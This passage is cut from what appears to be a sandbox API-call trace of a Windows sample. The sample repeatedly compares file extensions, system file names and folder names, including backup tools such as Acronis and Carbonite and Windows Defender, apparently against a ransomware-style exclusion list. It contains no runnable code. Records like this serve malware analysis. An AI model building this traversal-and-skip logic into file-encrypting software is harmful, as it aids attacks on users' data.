dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.458] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.458] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.458] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.458] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.458] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.458] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.458] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.458] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.458] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.458] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0100.458] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.459] CharUpperBuffW (in: lpsz="\\ACRONIS\\", cchLength=0x9 | out: lpsz="\\ACRONIS\\") returned 0x9 [0100.459] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.459] CharUpperBuffW (in: lpsz="\\BACKUPCLIENT\\", cchLength=0xe | out: lpsz="\\BACKUPCLIENT\\") returned 0xe [0100.459] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.459] CharUpperBuffW (in: lpsz="\\BACKUP MANAGER\\", cchLength=0x10 | out: lpsz="\\BACKUP MANAGER\\") returned 0x10 [0100.459] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.459] CharUpperBuffW (in: lpsz="\\CARBONITE\\", cchLength=0xb | out: lpsz="\\CARBONITE\\") returned 0xb [0100.459] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.459] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0100.459] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.459] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0100.459] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.459] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0100.459] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\JA\\") returned 0x49 [0100.459] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0100.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0100.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", 